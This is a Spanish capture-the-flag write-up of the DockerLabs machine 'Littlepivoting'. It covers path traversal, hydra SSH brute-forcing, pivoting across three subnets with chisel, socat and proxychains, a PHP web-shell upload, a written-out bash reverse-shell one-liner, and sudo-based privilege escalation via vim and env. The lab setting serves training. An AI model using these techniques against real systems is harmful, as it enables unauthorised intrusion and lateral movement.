> For the complete documentation index, see [llms.txt](https://burple.gitbook.io/burple/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://burple.gitbook.io/burple/dockerlabs/medio/littlepivoting.md).

# Littlepivoting

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2F150dqm20Vf1VaGpHVaci%2Fimage.png?alt=media&amp;token=e5df0dc3-5247-4d3f-80e8-2eaa179b6387" alt=""><figcaption></figcaption></figure>

Primero desplegamos la maquina

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2Fm30tovhG6sQqwfUvT47I%2Fimage.png?alt=media&amp;token=c10e22f6-418b-456a-b86b-7b6157414a06" alt=""><figcaption></figcaption></figure>

## Fase de reconocimiento

Realizamos un escaneo de nmap:

```bash
nmap -sSVC -Pn -vvv -open -min-rate 5000 10.10.10.2
```

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FlXb5UDOjRBOUckvoEGaO%2Fimage.png?alt=media&amp;token=77ee8a0d-1d1a-4c2e-a931-1dfdeef559c3" alt=""><figcaption></figcaption></figure>

Hacemos un gobuster y encontramos "/shop"

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FNIrI0WKNI1KoHBRpxz2Y%2Fimage.png?alt=media&amp;token=acdca80e-c1cf-4581-a29c-945fb8402ec9" alt=""><figcaption></figcaption></figure>

## Fase de intrusión

Voy al index.php de /shop y intento ver el /etc/passwd pero no puedo, con un directory path traversal consigo ver el archivo con éxito

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FUILy0IMtJxI5F4XU3Vpn%2Fimage.png?alt=media&amp;token=adaf1403-2531-4d5c-9716-34966a11b443" alt=""><figcaption></figcaption></figure>

Ahora vamos a hacer un ataque de fuerza bruta haciendo uso de la herramienta hydra

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FZN81BfEmCTZ5zvQJhQLq%2Fimage.png?alt=media&amp;token=c46c137f-2c4c-4f76-b60d-6dbc46b25d35" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FtqPR0a9c1ao95YuoHQkg%2Fimage.png?alt=media&amp;token=9a5f8d36-9894-4c23-907b-b91ae07b5b01" alt=""><figcaption></figcaption></figure>

Ahora vamos a entrar al puerto ssh con los credenciales obtenidos.

Hacemos un hostname -I y vemos nuestra maquina victima(1 10.10.10.2) y nuestra maquinas victima (2, 20.20.20.2), vamos a correr el siguiente script para descubrir más IP's

```bash
#!/bin/bash

for host in $(seq 1 254); do
	timeout 1 bash -c "ping -c 1 20.20.20.$host &>/dev/null" && echo "[+] HOST - 20.20.20.$host"
done; wait
```

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FWLqACojFrdjxiZzOnoM4%2Fimage.png?alt=media&amp;token=c9b0c008-bc05-48b8-8d5f-0523138eb728" alt=""><figcaption><p>(ssh manchi@10.10.10.2)</p></figcaption></figure>

## Escala de privilegios

No tenemos conectividad a las IP's 20.20.20.0, por lo tanto vamos a usar [chisel](https://github.com/jpillora/chisel/releases) para redireccionar el trafico a nuestra maquina atacante haciendo un servidor de chisel

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FIvZhzuxGyN8eswZfvMJn%2Fimage.png?alt=media&amp;token=603e2517-14d4-407a-ac10-4e62e6953b4b" alt=""><figcaption><p>(Primero abrimos un server python (para poder descargar chisel en 10.10.10.2) desde nuestra maquina atacante)</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FA8nPLJHY5RaKyN5fuU2p%2Fimage.png?alt=media&amp;token=b0f1a683-2f1d-4d55-8c23-63caa5db938b" alt=""><figcaption><p>(Descargamos chisel y le damos permisos chmod +x chisel (tamb en nuestra maquina atacante))</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FQHY2s9VwmxjDynTXSfkS%2Fimage.png?alt=media&amp;token=2a58f99f-2393-421f-aa82-b9de1777c5f1" alt=""><figcaption><p>(Abrimos el servidor en nuestra maquina atacante)</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2F7kuDyYFpXyC8ZWfwTJh0%2Fimage.png?alt=media&amp;token=dfc1a9eb-04ad-4fe1-86cc-7e2292a7fc60" alt=""><figcaption><p>(Nos conectamos a nuestro server d chisel)</p></figcaption></figure>

Hacemos un nano /etc/proxychains.conf y demarcamos dynamic\_chain y marcamos con #strict\_chain, y al final añadimos socks5 127.0.0.1 1080

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FGn5DKa6SCZfyLzEZeg5b%2Fimage.png?alt=media&amp;token=fd95b949-5c0d-4c48-abf7-a7fe86bf37b5" alt=""><figcaption><p>(Esto lo hacemos porque nuestro server chisel esta escuchando al 127.0.0.1:1080, asi cuando usemos proxychains, se podra conectar con nuestro server chisel)</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FZJaDSSlCACXT0SnCglBl%2Fimage.png?alt=media&amp;token=a8466ae5-1db7-40a6-ac6f-3a4f3359bb29" alt=""><figcaption><p>TIP/CONSEJO: Ir controlando bien el nombre y nombrar bien las tablas o sino sera y lio muy gordo al final</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2Fde43OdMEAohwCssWRqWH%2Fimage.png?alt=media&amp;token=4e95973d-3e3a-48e6-aa55-08ce93fab859" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2F9oFkt4l9W7bGNM7wTho3%2Fimage.png?alt=media&amp;token=d950d772-31e2-414a-92d5-3f0c610026cb" alt=""><figcaption><p>Esto es lo que pasa si hacemos un escaneo de nmap normal</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FQ0NcM9JHtK4Kk6XxyU9u%2Fimage.png?alt=media&amp;token=3fc90225-2901-4ccc-bd78-3cc53cb2c12e" alt=""><figcaption></figcaption></figure>

Añadimos a foxyproxy la IP con socks5 127.0.0.1:1080

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FgQ6E3x59Fp0Flpogq8eT%2Fimage.png?alt=media&amp;token=9ffa1039-4b99-47ea-b593-92996b88d19e" alt=""><figcaption><p>Lo activamos y ya nos carga</p></figcaption></figure>

Para que nos funcione el gobuster tenemos q añadir --proxy y añadir el proxy de nuestro server chisel, encontramos "/secret.php"

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2F7waCVwZio7we4eUmbmNr%2Fimage.png?alt=media&amp;token=0767d698-dea1-40dc-b5cf-6aa540f05205" alt=""><figcaption></figcaption></figure>

El usuario "Mario" me da que podria ser el usuario de ssh de 20.20.20.3, asi que vamos a usar hydra&#x20;

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FK4XM8iiU5lQ5FSKxDH6s%2Fimage.png?alt=media&amp;token=34368332-8b0e-4531-b019-9aa8788776da" alt=""><figcaption></figcaption></figure>

Encontramos los credenciales rapidamente :D

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FznoQdMPFDtMVTrH5wXGk%2Fimage.png?alt=media&amp;token=cd4ce035-2e75-4405-b2f8-ed1fd781925f" alt=""><figcaption></figcaption></figure>

Vamos a conectarnos con proxychains (obviamente porque sino, como podriamos llegar a la 20.20.20.3 sin pasar por nuestro server chisel? (el cual tiene conexion a la 10.10.10.2, q a su vez tiene conectividad a la 20.20.20.2 y a su vez la 20.20.20.3))

Actualizamos nuestro canvas

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FmQbGvqSRk7HRNHbe1KQ1%2Fimage.png?alt=media&amp;token=ea7d9787-975b-4109-a991-1223e861c2ce" alt=""><figcaption></figcaption></figure>

Vemos que todos los usuarios pueden ejecutar vim asi que vamos a buscar GTOBins para binarios vulnerables

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FnUmmoPZcrZbMcgimLumU%2Fimage.png?alt=media&amp;token=eab478b8-8439-4737-adec-92e7158da76b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FQ8JxDhJYB93367qz01Uo%2Fimage.png?alt=media&amp;token=549a3fc4-6b3d-4641-b5ab-2aa8ad82f63d" alt=""><figcaption><p>Ejecutamos el binario vulnerable y obtenemos root</p></figcaption></figure>

Bien, ahora vamos a correr el mismo script que de antes en busqueda de mas IP's, pero no funciona porque no tenenmos ping

```bash
#!/bin/bash

for host in $(seq 1 254); do

        timeout 1 bash -c "ping -c 1 30.30.30.$host &>/dev/null" && echo "[+] HOST - 30.30.30.$host is alive!" &

done; wait
```

Asi que vamos a usar el siguiente:

```bash
#!/bin/bash

for host in $(seq 1 254); do

        timeout 1 bash -c "echo '' > /dev/tcp/30.30.30.$host/80 &>/dev/null" && echo "[+] HOST - 30.30.30.$host" &

done; wait
```

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2Fi5TwUYZsuSMhXsMipLhg%2Fimage.png?alt=media&amp;token=4bc3e34e-9f18-4e6c-9ffb-58c18da0bbac" alt=""><figcaption></figcaption></figure>

Ahora a continuacion tendremos que usar socat, porque? Porque chisel solo puede redireccionar el trafico para adelante, encambio socat puede direccionar el trafico de otra maquina a otra (de puerto a puerto y ip). Instalar [socat ](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)en vuestra maquina atacante, os hara falta

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FIhpbumCNmCYcjKDOFvJj%2Fimage.png?alt=media&amp;token=b5a2427d-f7fd-4504-a488-9d6c4880a0de" alt=""><figcaption></figcaption></figure>

Vamos a usar scp para poder mandar los archivos utilizaremos la herramienta scp

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FRRFzVqWyZS3oAADLk3F5%2Fimage.png?alt=media&amp;token=4c0b8ed9-a2e8-4d4b-8990-4c4f0eadea62" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FFSKcKRuPf81cxsXlf15Y%2Fimage.png?alt=media&amp;token=512bca87-c0bf-4774-a00d-1627c7a70c96" alt=""><figcaption><p>Nos abrimos un server para poder pasar socar a manchi (10.10.10.2)</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FvhmAR7xhXxrafspaSNUD%2Fimage.png?alt=media&amp;token=3c7f21c1-5797-4dcd-a066-2e1e94a7e318" alt=""><figcaption><p>Ya podemos cerrar el server de python recien creado</p></figcaption></figure>

Como queremos q desde manchi se redireccione a nuestro server chisel, vamos a hacer lo siguiente desde mario root (20.20.20.3/30.30.30.2):

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FLmyYUMi4gqyxFxvrzjsU%2Fimage.png?alt=media&amp;token=43b8043b-6935-4953-81ae-0f29df2dee4f" alt=""><figcaption><p>Lo que estaria haciendo es mandar el trafico a la 20.20.20.2 (manchi), y desde ahi a nuestro server chisel</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FTMQtuYI3iMRaQswKGxy1%2Fimage.png?alt=media&amp;token=32f93f6b-3bcc-4179-9efe-ffbfce53dd2c" alt=""><figcaption><p>Se nos ha conectado bien a nuestro server main chisel</p></figcaption></figure>

Porque hemos puesto 1081 y no 1080? Porque el 1080 ya esta en uso por manchi, asi que vamos otra vez /etc/proxychains y vamos a añadir 127.0.0.1 1081

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FaIng3NDebG0wHrk9UMyi%2Fimage.png?alt=media&amp;token=a8ed6636-d793-4af4-affd-a9a9daa8ae4d" alt=""><figcaption></figcaption></figure>

Añadimos a foxyproxy nuestro nuevo socks5 que nos dara acceso a la IP 30.30.30.3

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FmOLZ0VhBtMwvfiY0ZEV7%2Fimage.png?alt=media&amp;token=916c9b84-c567-4c3e-b5f0-bc165a685747" alt=""><figcaption></figcaption></figure>

Lo activamos y... Boom, tiene pinta que habra que subir una revershell como una casa

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FKsR3ZDyUHmwC5sjY2Wgj%2Fimage.png?alt=media&amp;token=81408060-979e-4b81-88da-161515ab7c9c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2F42kENpngSw5i6uX1eVqI%2Fimage.png?alt=media&amp;token=3679bba1-e7e2-4943-8e3b-43b7b329c3ca" alt=""><figcaption><p>Nos creamos rapidamente un cmd en .php </p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2F7VBOeXe5ovqXqXz9sPoQ%2Fimage.png?alt=media&amp;token=458c1d23-90d6-4c58-8845-3dc3ca8107a0" alt=""><figcaption><p>Subimos el archivo</p></figcaption></figure>

No se donde se ha subido entonces hago un escaneo rapido con gobuster

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FN7Ya8udthWEeUbsgJ8Sj%2Fimage.png?alt=media&amp;token=abfe6aa4-b6c3-49f3-831b-8a8f5f14e0bc" alt=""><figcaption><p>Encontramos la ruta rapidamente</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FLvgQU1fn7SFadJsj77vl%2Fimage.png?alt=media&amp;token=51bee91c-e12d-447b-a0d9-6e3f70a8814f" alt=""><figcaption><p>Funciona correctamente, por lo tante voy a mandar una reserveshell</p></figcaption></figure>

PERO antes de mandar la revershell tenemos que establecer 2 conexiones mas de socat&#x20;

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FLrmEFREe5xguGrkbZ4Ly%2Fimage.png?alt=media&amp;token=1653bc0b-a643-412d-8c19-9fa24e5f4db5" alt=""><figcaption><p>mandamos socat con scp</p></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FdmnYgd0WE8qpDStX8SLD%2Fimage.png?alt=media&amp;token=dd8342c0-963c-4f30-82f7-1b16d230715e" alt=""><figcaption><p>abrimos la conexcion con socat la cual redirije a la 20.20.20.2 (manchi)</p></figcaption></figure>

Ahora si mandamos la revershell&#x20;

```bash
bash -c "bash -i >& /dev/tcp/30.30.30.2/5531 0>&1"
```

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FSz1bi5U6A8OIrPnt0woO%2Fimage.png?alt=media&amp;token=7b19acf0-8b90-47de-b22a-7697ab79993a" alt=""><figcaption></figcaption></figure>

[Depuración de tty](/burple/cheats/depuracion-de-tty.md)

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FSB5a0QkH6rBmirzP8gY3%2Fimage.png?alt=media&amp;token=52261599-f908-4b1e-b0b0-6cc781a5a573" alt=""><figcaption></figcaption></figure>

Vemos que root puede ejecutar sin contraseña env, asi que vamos a GTFOBins a buscar el binario vulnerable

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FpuuOSEvpoP4vBKgYon3d%2Fimage.png?alt=media&amp;token=741635cc-4d66-4be2-b79f-3e6e430cecb0" alt=""><figcaption></figcaption></figure>

Ya hubieramos conseguido root

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2F1sr8gAqcRPu46uIx4Fgo%2Fimage.png?alt=media&amp;token=17ad7b00-74a4-4809-84d8-0107a1aa8e61" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FHDtzdGz8QAJecVKXpGpd%2Fimage.png?alt=media&amp;token=59025452-2ddc-42e8-aef9-5b956726cfc3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2216970731-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FgI96Zsgdt6Oh2PlOLDwP%2Fuploads%2FP13m2Gj5ONd1BcFY9Ets%2Fimage.png?alt=media&amp;token=03157848-f0fc-4a48-808e-67dabfa8951b" alt=""><figcaption></figcaption></figure>
